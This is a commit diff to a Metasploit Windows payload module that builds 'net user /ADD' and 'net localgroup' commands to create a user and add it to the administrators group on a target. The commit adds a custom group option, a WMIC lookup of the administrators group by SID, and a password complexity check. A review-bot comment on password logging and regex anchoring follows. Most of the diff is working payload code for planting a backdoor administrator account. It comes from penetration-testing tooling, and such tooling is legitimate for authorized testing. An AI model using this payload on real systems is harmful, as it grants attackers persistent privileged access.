Added WMIC and complexity checks

unstable
Chris John Riley 2012-06-02 19:41:12 +02:00
parent bada88cdf0
commit ea66deb779
1 changed files with 34 additions and 4 deletions


@ -28,7 +28,7 @@ module Metasploit3
'Name' => 'Windows Execute net user /ADD', 'Name' => 'Windows Execute net user /ADD',
'Version' => '$Revision$', 'Version' => '$Revision$',
'Description' => 'Create a new user and add them to local administration group', 'Description' => 'Create a new user and add them to local administration group',
'Author' => 'hdm', 'Author' => ['hdm','Chris John Riley'],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Platform' => 'win', 'Platform' => 'win',
'Arch' => ARCH_X86, 'Arch' => ARCH_X86,
@ -39,6 +39,13 @@ module Metasploit3
[ [
OptString.new('USER', [ true, "The username to create", "metasploit" ]), OptString.new('USER', [ true, "The username to create", "metasploit" ]),
OptString.new('PASS', [ true, "The password for this user", "metasploit" ]), OptString.new('PASS', [ true, "The password for this user", "metasploit" ]),
OptString.new('CUSTOM', [ false, "Custom group name to be used instead of default", '' ]),
OptBool.new('WMIC', [ true, "Use WMIC on the target to resolve administrators group", false ]),
], self.class)
register_advanced_options(
[
OptBool.new("COMPLEXITY", [ true, "Check password for complexity rules", true ]),
], self.class) ], self.class)
# Hide the CMD option...this is kinda ugly # Hide the CMD option...this is kinda ugly
@ -51,13 +58,36 @@ module Metasploit3
def command_string def command_string
user = datastore['USER'] || 'metasploit' user = datastore['USER'] || 'metasploit'
pass = datastore['PASS'] || '' pass = datastore['PASS'] || ''
cust = datastore['CUSTOM'] || ''
wmic = datastore['WMIC']
complexity= datastore['COMPLEXITY']
if(pass.length > 14) if(pass.length > 14)
raise ArgumentError, "Password for the adduser payload must be 14 characters or less" raise ArgumentError, "Password for the adduser payload must be 14 characters or less"
end end
if (pass =~ /\A^.*((?=.{8,})(?=.*[a-z])(?=.*[A-Z])(?=.*[\d\W])).*$/) and complexity
print_good "Password: #{pass} passes complexity checks"
elsif complexity
print_error "Password: #{pass} doesn't meet complexity requirements and may cause issues"
end
if not cust.empty?
print_status("Using custom group name #{cust}")
return "cmd.exe /c net user #{user} #{pass} /ADD && " +
"net localgroup \"#{cust}\" #{user} /ADD"
elsif wmic
print_status("Using WMIC to discover the administrative group name")
return "cmd.exe /c \"FOR /F \"usebackq tokens=2* skip=1 delims==\" " +
"%G IN (`wmic group where sid^='S-1-5-32-544' get name /Value`); do " +
"FOR /F \"usebackq tokens=1 delims==\" %X IN (`echo %G`); do " +
"net user #{user} #{pass} /ADD && " +
"net localgroup \"%X\" #{user} /ADD\""
else
return "cmd.exe /c net user #{user} #{pass} /ADD && " + return "cmd.exe /c net user #{user} #{pass} /ADD && " +
"net localgroup Administrators #{user} /ADD" "net localgroup Administrators #{user} /ADD"
end end
end end
end
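Review bot: Both status messages in the new complexity branch of `command_string` interpolate `#{pass}`, so the cleartext password is written to console output and to any log that captures it. The check only needs to report the result, for example `print_good "Password passes complexity checks"`, with the same change on the `print_error` line. The pattern also opens with a redundant `\A^` and ends on `$`, which in Ruby matches before a trailing newline; anchoring with `\A` and `\z` would test the whole string. The messages are emitted from inside `command_string`, so they presumably repeat each time the command is built; moving the check to option validation would avoid that, though where that happens is outside this diff.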